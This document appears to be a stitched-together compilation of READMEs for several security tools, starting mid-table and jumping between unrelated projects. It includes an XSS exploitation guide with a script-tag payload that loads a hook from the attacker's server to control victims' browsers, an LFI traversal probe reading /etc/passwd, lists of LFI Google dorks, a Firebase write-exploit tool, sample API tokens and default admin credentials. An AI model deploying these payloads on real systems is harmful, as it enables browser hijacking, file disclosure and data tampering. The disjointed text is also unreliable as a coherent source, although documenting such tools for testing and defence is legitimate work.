| 7 | POODLE | 8 | OpenSSL CCS Injection |
| 9 | FREAK | 10 | Firewall |
| 11 | LOGJAM | 12 | FTP Service |
| 13 | STUXNET | 14 | Telnet Service |
| 15 | LOG4j | 16 | Stress Tests |
| 17 | WebDAV | 18 | LFI, RFI or RCE |
| 19 | XSS, SQLi, BSQL | 20 | XSS Header not present |
| 21 | Shellshock Bug | 22 | Leaks Internal IP |
| 23 | HTTP PUT DEL Methods | 24 | MS10-070 |
| 25 | Outdated | 26 | CGI Directories |
| 27 | Interesting Files | 28 | Injectable Paths |
| 29 | Subdomains | 30 | MS-SQL DB Service |
| 31 | ORACLE DB Service | 32 | MySQL DB Service |
| 33 | RDP Server over UDP and TCP | 34 | SNMP Service |
| 35 | Elmah | 36 | SMB Ports over TCP and UDP |
| 37 | IIS WebDAV | 38 | X-XSS Protection |
git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt
Template contributions, feature requests, and bug reports are more than welcome.
Contributions, issues, and feature requests are welcome!
Feel free to check the issues page.
XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.
This tool is for educational purposes only; do not use it against real environments.
Tested on Debian 11.
You will need Apache, a MySQL database, and PHP with the following modules:
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html
Install Git and pull the XSS-Exploitation-Tool source code:
$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/
Install composer, then install the application dependencies:
$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:www-data /var/www/
$ sudo mysql
Creating a new user with specific rights:
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> quit
Bye
Creating the database (will result in an empty page):
Visit the page http://server-ip/reset_database.php
The file hook.js is the JavaScript hook. Replace the IP address on its first line with the IP address of the XSS Exploitation Tool server:
var address = "your server ip";
First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the JavaScript hook file (see exploit.html in the root directory):
?vulnerable_param=<script src="http://your_server_ip/hook.js"/>
Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers.
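When delivering the payload through a query string, it usually needs to be URL-encoded first. A minimal Python sketch (the target URL and parameter name are placeholders from the example above):

```python
from urllib.parse import quote

server_ip = "your_server_ip"  # placeholder, as in the example above
payload = f'<script src="http://{server_ip}/hook.js"/>'

# URL-encode the payload for the vulnerable query parameter.
url = f"http://victim.example/page?vulnerable_param={quote(payload, safe='')}"
print(url)
```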
An all-in-one tool: LFI vulnerability finder and LFI dork finder.
Instagram: TMRSWRR
LFI Space is a robust and efficient tool designed to detect Local File Inclusion (LFI) vulnerabilities in web applications. This tool simplifies the process of identifying potential security flaws by leveraging two distinct scanning methods: Google Dork Search and Targeted URL Scan. With its comprehensive approach, LFI Space assists security professionals, penetration testers, and ethical hackers in assessing the security posture of web applications.
The Google Dork Search functionality within LFI Space harnesses the power of the Google search engine to identify web pages that may be susceptible to LFI attacks. By employing carefully crafted Google dorks, the tool retrieves search results that are likely to contain vulnerable pages. These dorks are specific queries designed to target common LFI vulnerability patterns in web applications. LFI Space then analyzes the responses from these pages, meticulously examining the content to identify any signs of LFI vulnerabilities. This approach allows for a broad and automated search, rapidly surfacing potential targets for further investigation.
Additionally, LFI Space provides a Targeted URL Scan feature, enabling users to manually input a list of specific URLs for scanning. This functionality allows for a more focused approach, enabling security professionals to assess particular web applications or pages of interest. By scanning each URL individually, LFI Space thoroughly inspects the target web pages for any signs of LFI vulnerabilities. This targeted approach provides flexibility and precision in identifying potential security weaknesses.
It is important to note that LFI Space is intended for responsible and authorized use, such as security testing, vulnerability assessments, or penetration testing, with proper consent and legal permissions. It is crucial to adhere to ethical guidelines and respect the privacy and security of targeted systems.
In conclusion, LFI Space is a powerful tool that combines Google Dork Search and Targeted URL Scan functionalities to detect Local File Inclusion vulnerabilities in web applications. By automating the search for potentially vulnerable pages and providing the ability to scan specific URLs, LFI Space empowers security professionals to identify LFI vulnerabilities effectively. With its user-friendly interface and comprehensive scanning capabilities, LFI Space is an invaluable asset for enhancing the security posture of web applications.
inurl:/filedown.php?file=
inurl:/news.php?include=
inurl:/view/lang/index.php?page=?page=
inurl:/shared/help.php?page=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:index2.php?to=
inurl:index.php?load=
inurl:home.php?pagina=
/surveys/survey.inc.php?path=
index.php?body=
/classes/adodbt/sql.php?classes_dir=
enc/content.php?Home_Path=
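To illustrate the Targeted URL Scan idea described above, here is a sketch of the general LFI check (not LFI Space's actual implementation; the traversal payload and /etc/passwd marker are common conventions):

```python
import requests

PAYLOAD = "../../../../etc/passwd"  # classic path-traversal payload
MARKER = "root:x:0:0:"              # tell-tale /etc/passwd content

def looks_lfi_vulnerable(url_with_param: str) -> bool:
    """Append a traversal payload to a URL ending in 'param=' and inspect the response."""
    try:
        resp = requests.get(url_with_param + PAYLOAD, timeout=10)
    except requests.RequestException:
        return False
    return MARKER in resp.text

# Example (hypothetical target):
# print(looks_lfi_vulnerable("http://target.example/index.php?page="))
```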
git clone https://github.com/capture0x/Lfi-Space/
cd Lfi-Space
pip3 install -r requirements.txt
python3 lfi.py
Contributions are welcome! If you find any issues or have suggestions for improvements, please open an issue or submit a pull request.
For bug reports or enhancements, please open an issue here.
Copyright 2023
Secure Your API.
With Metlo you can:
Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.
There are three ways to get started with Metlo: Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users, as it scales to hundreds of millions of requests per month and all upgrades and migrations are managed for you.
You can get started with Metlo Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.
Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system, you can self-host Metlo as well! Create an account on https://my.metlo.com and follow the instructions in our docs here to set up Metlo in your own cloud environment.
If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.
You can also join our Discord community if you need help or just want to chat!
For tests that we can't autogenerate, our built-in testing framework helps you get to 100% security coverage on your highest-risk APIs. You can build tests in a YAML format to make sure your API is working as intended.
For example, the following test checks for broken authentication:
id: test-payment-processor-metlo.com-user-billing
meta:
  name: test-payment-processor.metlo.com/user/billing Test Auth
  severity: CRITICAL
  tags:
    - BROKEN_AUTHENTICATION
test:
  - request:
      method: POST
      url: https://test-payment-processor.metlo.com/user/billing
      headers:
        - name: Content-Type
          value: application/json
        - name: Authorization
          value: ...
      data: |-
        { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
      - key: resp.status
        value: 200
  - request:
      method: POST
      url: https://test-payment-processor.metlo.com/user/billing
      headers:
        - name: Content-Type
          value: application/json
      data: |-
        { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
      - key: resp.status
        value: [ 401, 403 ]
You can see more information on our docs.
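The same broken-authentication check can be sketched outside the YAML framework, for example in Python with requests (the URL, body, and Authorization value are the placeholders from the test above):

```python
import requests

URL = "https://test-payment-processor.metlo.com/user/billing"  # from the test above
BODY = {"ccn": "...", "cc_exp": "...", "cc_code": "..."}

# With valid credentials the endpoint should succeed...
with_auth = requests.post(URL, json=BODY, headers={"Authorization": "..."})
assert with_auth.status_code == 200

# ...and without credentials it must be rejected.
without_auth = requests.post(URL, json=BODY)
assert without_auth.status_code in (401, 403), "endpoint accepts unauthenticated requests!"
```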
Most businesses have adopted public-facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. There's been a 200% increase in API security breaches in just the last year, with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure, but there's no great solution on the market.
Some solutions require you to go through sales calls to even try the product, while others make you send all your API traffic to their own cloud. Metlo is the first Open Source API security platform that you can self-host, and you can get started for free right away!
We would love for you to come help us make Metlo better. Come join us at Metlo!
This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.
Checkout our development guide for more info on how to develop Metlo locally.
- exploit.json to upload during exploit
- URI path for exploit

This will display help for the CLI tool. Here are all the required arguments it supports.
FirebaseExploiter was built using go1.19. Make sure you use the latest version of Go for the install to succeed. Run the following command to install the latest version:
go install -v github.com/securebinary/firebaseExploiter@latest
To scan a specific domain to check for Insecure Firebase DB.
To exploit a Firebase DB to write your own JSON document in it.
Create your own exploit.json file in proper JSON format to exploit vulnerable Firebase DBs.
Checking the exploited URL to verify the vulnerability.
Adding a custom path for exploiting Firebase DBs.
Mass scanning for Insecure Firebase Databases from list of target hosts.
Exploiting vulnerable Firebase DBs from the list of target hosts.
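The underlying check for an insecure Firebase DB is simple to reproduce. A Python sketch of the well-known read test (this mirrors the general technique, not FirebaseExploiter's internals):

```python
import requests

def firebase_db_readable(project: str) -> bool:
    """An open Firebase Realtime Database answers GET /.json without auth."""
    resp = requests.get(f"https://{project}.firebaseio.com/.json", timeout=10)
    # A locked-down DB returns an error object such as {"error": "Permission denied"}.
    return resp.status_code == 200 and b'"error"' not in resp.content

# Example (hypothetical project name):
# print(firebase_db_readable("vulnerable-project"))
```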
FirebaseExploiter is made with love by the SecureBinary team. Any tweaks / community contributions are welcome.
Fast and lightweight, UDPX is a single-packet UDP scanner written in Go that supports the discovery of over 45 services with the ability to add custom ones. It is easy to use and portable, and can be run on Linux, Mac OS, and Windows. Unlike internet-wide scanners like zgrab2 and zmap, UDPX is designed for portability and ease of use.
Scanning UDP ports is very different from scanning TCP: you may or may not get a result back when probing a UDP port, as UDP is a connectionless protocol. UDPX implements a single-packet approach: a protocol-specific packet is sent to the defined service (port), and UDPX waits for a response. The timeout is set to 500 ms by default and can be changed with the -w flag. If the service sends a packet back within this time, it is certain that it is indeed listening on that port, and the port is reported as open.
A typical technique is to send 0-byte UDP packets to each port on the target machine. If an "ICMP Port Unreachable" message is received, the port is closed. If a UDP response is received to the probe (unusual), the port is open. If there is no response at all, the state is open or filtered, meaning the port is either open or packet filters are blocking the communication. This method is not implemented in UDPX, as it adds no value (UDPX tests only for specific protocols).
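The single-packet approach described above boils down to one sendto/recvfrom pair with a timeout. Here is a minimal Python sketch of the technique (not UDPX's actual code; the NTP payload in the usage comment is a standard client request, used purely as an illustrative probe):

```python
import socket

def udp_probe(host: str, port: int, payload: bytes, timeout: float = 0.5) -> bool:
    """Send one protocol-specific datagram; any reply means the port is open."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)  # 500 ms, matching UDPX's default
        sock.sendto(payload, (host, port))
        try:
            sock.recvfrom(4096)
            return True   # got a response: the service is listening
        except socket.timeout:
            return False  # no reply: open|filtered, so not reported as open

# Example: a 48-byte NTP client request (LI=0, VN=3, Mode=3).
# print(udp_probe("pool.ntp.org", 123, b"\x1b" + 47 * b"\x00"))
```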
Concurrency: By default, concurrency is set to 32 connections only (so you don't crash anything). If you have a lot of hosts to scan, you can set it to 128 or 256 connections. Based on your hardware, connection stability, and ulimit (on *nix), you can run 512 or more concurrent connections, but this is not recommended.
To scan a single IP:
udpx -t 1.1.1.1
To scan a CIDR with maximum of 128 connections and timeout of 1000 ms:
udpx -t 1.2.3.4/24 -c 128 -w 1000
To scan targets from file with maximum of 128 connections for only specific service:
udpx -tf targets.txt -c 128 -s ipmi
Target can be:
IPv6 is supported.
If you want to store the results, use the -o [filename] flag. Output is in JSONL format, as can be seen below:
{"address":"45.33.32.156","hostname":"scanme.nmap.org","port":123,"service":"ntp","response_data":"JAME6QAAAEoAAA56LU9vp+d2ZPwOYIyDxU8jS3GxUvM="}
__ ______ ____ _ __
/ / / / __ \/ __ \ |/ /
/ / / / / / / /_/ / /
/ /_/ / /_/ / ____/ |
\____/_____/_/ /_/|_|
v1.0.2-beta, by @nullt3r
Usage of ./udpx-linux-amd64:
-c int
Maximum number of concurrent connections (default 32)
-nr
Do not randomize addresses
-o string
Output file to write results
-s string
Scan only for a specific service, one of: ard, bacnet, bacnet_rpm, chargen, citrix, coap, db, db, digi1, digi2, digi3, dns, ipmi, ldap, mdns, memcache, mssql, nat_port_mapping, natpmp, netbios, netis, ntp, ntp_monlist, openvpn, pca_nq, pca_st, pcanywhere, portmap, qotd, rdp, ripv, sentinel, sip, snmp1, snmp2, snmp3, ssdp, tftp, ubiquiti, ubiquiti_discovery_v1, ubiquiti_discovery_v2, upnp, valve, wdbrpc, wsd, wsd_malformed, xdmcp, kerberos, ike
-sp
Show received packets (only first 32 bytes)
-t string
IP/CIDR to scan
-tf string
File containing IPs/CIDRs to scan
-w int
Maximum time to wait for a response (socket timeout) in ms (default 500)
You can grab prebuilt binaries in the release section. If you want to build UDPX from source, follow these steps:
From git:
git clone https://github.com/nullt3r/udpx
cd udpx
go build ./cmd/udpx
You can find the binary in the current directory.
Or via go:
go install -v github.com/nullt3r/udpx/cmd/udpx@latest
After that, you can find the binary in $HOME/go/bin/udpx. If you want, move the binary to /usr/local/bin/ so you can call it directly.
UDPX supports more than 45 services. The most interesting are:
The complete list of supported services:
Please send a feature request with the protocol name and port, and I will make it happen. Or add it on your own: the file pkg/probes/probes.go contains all available payloads. Specify the protocol name, port, and packet data (hex-encoded).
{
Name: "ike",
Payloads: []string{"5b5e64c03e99b51100000000000000000110020000000000000001500000013400000001000000010000012801010008030000240101"},
Port: []int{500, 4500},
},
I am not responsible for any damages. You are responsible for your own actions. Scanning or attacking targets without prior mutual consent can be illegal.
UDPX is distributed under MIT License.
How it works • Installation • Usage • MODES • For Developers • Credits
Introducing SCRIPTKIDDI3, a powerful recon and initial vulnerability detection tool for Bug Bounty Hunters. Built using a variety of open-source tools and a shell script, SCRIPTKIDDI3 allows you to quickly and efficiently run a scan on the target domain and identify potential vulnerabilities.
SCRIPTKIDDI3 begins by performing recon on the target system, collecting information such as subdomains, and running services with nuclei. It then uses this information to scan for known vulnerabilities and potential attack vectors, alerting you to any high-risk issues that may need to be addressed.
In addition, SCRIPTKIDDI3 also includes features for identifying misconfigurations and insecure default settings with nuclei templates, helping you ensure that your systems are properly configured and secure.
SCRIPTKIDDI3 is an essential tool for conducting thorough and effective recon and vulnerability assessments. Let's Find Bugs with SCRIPTKIDDI3
[Thanks ChatGPT for the Description]
This tool mainly performs 3 tasks
SCRIPTKIDDI3 requires different tools to run successfully. Run the following commands to install the latest version with all requirements:
git clone https://github.com/thecyberneh/scriptkiddi3.git
cd scriptkiddi3
bash installer.sh
scriptkiddi3 -h
This will display help for the tool. Here are all the switches it supports.
[ABOUT:]
Streamline your recon and vulnerability detection process with SCRIPTKIDDI3,
A recon and initial vulnerability detection tool built using shell script and open source tools.
[Usage:]
scriptkiddi3 [MODE] [FLAGS]
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
[MODES:]
['-m'/'--mode']
Available Options for MODE:
SUB | sub | SUBDOMAIN | subdomain Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
URL | url Run scriptkiddi3 in URL ENUMERATION mode
EXP | exp | EXPLOIT | exploit Run scriptkiddi3 in Full Exploitation mode
Features of EXPLOIT mode: subdomain enumeration, URL enumeration,
Vulnerability Detection with Nuclei,
and scan for SUBDOMAIN TAKEOVER
[FLAGS:]
[TARGET:] -d, --domain target domain to scan
[CONFIG:] -c, --config path of your configuration file for subfinder
[HELP:] -h, --help to get help menu
[UPDATE:] -u, --update to update tool
[Examples:]
Run scriptkiddi3 in full Exploitation mode
scriptkiddi3 -m EXP -d target.com
Use your own CONFIG file for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
Run scriptkiddi3 in SUBDOMAIN ENUMERATION mode
scriptkiddi3 -m SUB -d target.com
Run scriptkiddi3 in URL ENUMERATION mode
scriptkiddi3 -m URL -d target.com
Run SCRIPTKIDDI3 in FULL EXPLOITATION MODE
scriptkiddi3 -m EXP -d target.com
FULL EXPLOITATION MODE contains the following functions
Run scriptkiddi3 in SUBDOMAIN ENUMERATION MODE
scriptkiddi3 -m SUB -d target.com
SUBDOMAIN ENUMERATION MODE contains the following functions
Run scriptkiddi3 in URL ENUMERATION MODE
scriptkiddi3 -m URL -d target.com
URL ENUMERATION MODE contains the following functions
Using your own CONFIG File for subfinder
scriptkiddi3 -m EXP -d target.com -c /path/to/config.yaml
You can also provide your own CONFIG file with your API keys for subdomain enumeration with subfinder.
Updating the tool to the latest version: you can run the following command to update the tool.
scriptkiddi3 -u
An Example of config.yaml
binaryedge:
- 0bf8919b-aab9-42e4-9574-d3b639324597
- ac244e2f-b635-4581-878a-33f4e79a2c13
censys:
- ac244e2f-b635-4581-878a-33f4e79a2c13:dd510d6e-1b6e-4655-83f6-f347b363def9
certspotter: []
passivetotal:
- sample-email@user.com:sample_password
securitytrails: []
shodan:
- AAAAClP1bJJSRMEYJazgwhJKrggRwKA
github:
- ghp_lkyJGU3jv1xmwk4SDXavrLDJ4dl2pSJMzj4X
- ghp_gkUuhkIYdQPj13ifH4KA3cXRn8JD2lqir2d4
zoomeye:
- zoomeye_username:zoomeye_password
If you have ideas for new functionality or modes that you would like to see in this tool, you can always submit a pull request (PR) to contribute your changes.
If you have any other queries, you can always contact me on Twitter (thecyberneh).
I would like to express my gratitude to all of the open source projects that have made this tool possible and have made recon tasks easier to accomplish.
Uses Python 3.10, Debian, python-nmap, and the Flask framework to create an Nmap API that can run scans online at good speed and is easy to deploy.
This is an implementation for our college PCL project, which is still under development and constantly updated.
GET /api/p1/{username}:{password}/{target}
GET /api/p2/{username}:{password}/{target}
GET /api/p3/{username}:{password}/{target}
GET /api/p4/{username}:{password}/{target}
GET /api/p5/{username}:{password}/{target}
| Parameter | Type | Description |
|---|---|---|
| username | string | Required. Username of the current user |
| password | string | Required. Current user's password |
| target | string | Required. The target hostname or IP |
GET /api/p1/
GET /api/p2/
GET /api/p3/
GET /api/p4/
GET /api/p5/
| Parameter | Return data | Description | Nmap Command |
|---|---|---|---|
| p1 | json | Effective Scan | -Pn -sV -T4 -O -F |
| p2 | json | Simple Scan | -Pn -T4 -A -v |
| p3 | json | Low Power Scan | -Pn -sS -sU -T4 -A -v |
| p4 | json | Partial Intense Scan | -Pn -p- -T4 -A -v |
| p5 | json | Complete Intense Scan | -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln |
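Calling a scan profile is a single authenticated GET request. A minimal Python sketch (the host, port, and credentials are placeholders; this assumes the Flask app is reachable on localhost:5000):

```python
import requests

BASE = "http://127.0.0.1:5000"        # assumed local deployment
USER, PASSWORD = "user", "password"   # placeholder credentials
TARGET = "scanme.nmap.org"

# p2 = Simple Scan (-Pn -T4 -A -v), per the table above.
resp = requests.get(f"{BASE}/api/p2/{USER}:{PASSWORD}/{TARGET}", timeout=600)
print(resp.json())
```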
POST /adduser/{admin-username}:{admin-passwd}/{id}/{username}/{passwd}
POST /deluser/{admin-username}:{admin-passwd}/{t-username}/{t-userpass}
POST /altusername/{admin-username}:{admin-passwd}/{t-user-id}/{new-t-username}
POST /altuserid/{admin-username}:{admin-passwd}/{new-t-user-id}/{t-username}
POST /altpassword/{admin-username}:{admin-passwd}/{t-username}/{new-t-userpass}
| Parameter | Type | Description |
|---|---|---|
| admin-username | String | Admin username |
| admin-passwd | String | Admin password |
| id | String | ID for the newly added user |
| username | String | Username of the newly added user |
| passwd | String | Password of the newly added user |
| t-username | String | Target username |
| t-user-id | String | Target user ID |
| t-userpass | String | Target user's password |
| new-t-username | String | New username for the target |
| new-t-user-id | String | New user ID for the target |
| new-t-userpass | String | New password for the target |
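User management follows the same URL pattern. For example, adding a user (values are placeholders; the admin credentials are the defaults listed below):

```python
import requests
from urllib.parse import quote

BASE = "http://127.0.0.1:5000"                 # assumed local deployment
ADMIN = "ADMINISTRATOR"
ADMIN_PW = quote("zAp6_oO~t428)@,", safe="")   # default password, URL-encoded

# Add a user with id 2, username alice, password s3cret (all placeholders).
resp = requests.post(f"{BASE}/adduser/{ADMIN}:{ADMIN_PW}/2/alice/s3cret")
print(resp.status_code, resp.text)
```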
DEFAULT CREDENTIALS
ADMINISTRATOR : zAp6_oO~t428)@,
The security of mobile devices has become a critical concern due to the increasing amount of sensitive data being stored on them. With the rise of Android OS as the most popular mobile platform, the need for effective tools to assess its security has also increased. In response to this need, a new Android framework has emerged that combines four powerful tools - AndroPass, APKUtil, RMS, and MobFS - to conduct comprehensive vulnerability analysis of Android applications. This framework is known as QuadraInspect.
QuadraInspect is an Android framework that integrates AndroPass, APKUtil, RMS, and MobFS, providing a powerful tool for analyzing the security of Android applications. AndroPass is a tool that focuses on analyzing the security of Android applications' authentication and authorization mechanisms, while APKUtil extracts valuable information from an APK file. Lastly, MobFS and RMS facilitate the analysis of an application's filesystem by mounting its storage in a virtual environment.
By combining these four tools, QuadraInspect provides a comprehensive approach to vulnerability analysis of Android applications. This framework can be used by developers, security researchers, and penetration testers to assess the security of their own or third-party applications. QuadraInspect provides a unified interface for all four tools, making it easier to use and reducing the time required to conduct comprehensive vulnerability analysis. Ultimately, this framework aims to increase the security of Android applications and protect users' sensitive data from potential threats.
To install the tools you need to:
First: git clone https://github.com/morpheuslord/QuadraInspect
Second: open an administrative cmd or PowerShell (for the MobFS setup) and run: pip install -r requirements.txt && python3 main.py
Third: once QuadraInspect loads, run this command: QuadraInspect Main>> : START install_tools
The tools will be downloaded to the tools directory, and the setup.py and setup.bat commands will run automatically to complete the installation.
Each module has a help function, so the commands and descriptions are detailed and can be altered for operation.
These are the key points that must be addressed for smooth operation:
- The target can be set via args or by using SET target within the tool.
- The target file must be placed in the target folder, as all the tools look for the target file in that folder.
There are 2 modes:
|
├─> F mode
└─> A mode
The F mode is the interactive mode: you get an active interface with a prompt for using the framework.
F mode is the normal mode and can be used easily.
A mode, or argumentative mode, takes input via arguments and runs the commands without any user intervention. This is currently limited to the main menu; in the future I plan to extend this feature to the incorporated tools as well.
python main.py --target <APK_file> --mode a --command install_tools/tools_name/apkleaks/mobfs/rms/apkleaks
the main menu of the entire tool has these options and commands:
| Command | Description |
|---|---|
| SET target | Set the name of the target file |
| START install_tools | Install the tools if not already installed |
| LIST tools_name | List the integrated tools |
| START apkleaks | Use the APKLeaks tool |
| START mobfs | Use MobFS for dynamic and static analysis |
| START andropass | Use the AndroPass APK analyzer |
| help | Display the help menu |
| SHOW banner | Display the banner |
| quit | Quit the program |
As mentioned above, the target must be set before any tool is used.
The APKLeaks menu is also really straightforward, with only a few things to consider:
- SET output and SET json-out take file names, not actual files; the output is created in the result directory.
- The SET pattern option takes the name of a JSON pattern file. The JSON file must be located in the pattern directory.
directoryOPTION | SET Value |
---|---|
SET output | Output for the scan data file name |
SET arguments | Additional Disassembly arguments |
SET json-out | JSON output file name |
SET pattern | The pre-searching pattern for secrets |
help | Displays help menu |
return | Return to main menu |
quit | Quit the tool |
MobFS is pretty straightforward; only the port number needs attention. By default it runs on port 5000: just start the program and connect to 127.0.0.1:5000 in your browser.
AndroPass is also really straightforward: it just takes the file as input and does its job without any other input.
The APK analysis framework will follow a modular architecture, similar to Metasploit. It will consist of the following modules:
Currently there are only three, but people can add more tools if they want; these are the things to consider:
config/installer.py
config/mobfs.py , config/androp.py, config/apkleaks.py
If you want, you can make your own upgrades and add them to this repository for more people to use, helping this tool grow.
CertWatcher is a tool for capturing and tracking certificate transparency logs, using YAML templates. The tool helps detect and analyze websites using regular expression patterns and is designed for ease of use by security professionals and researchers.
Certwatcher continuously monitors the certificate data stream and checks for patterns or malicious activity. Certwatcher can also be customized to detect specific phishing, exposed tokens, secret api key patterns using regular expressions defined by YAML templates.
Certwatcher allows you to use custom templates to display the certificate information. We have some public custom templates available from the community. You can find them in our repository.
If you want to contribute to this project, follow the steps below: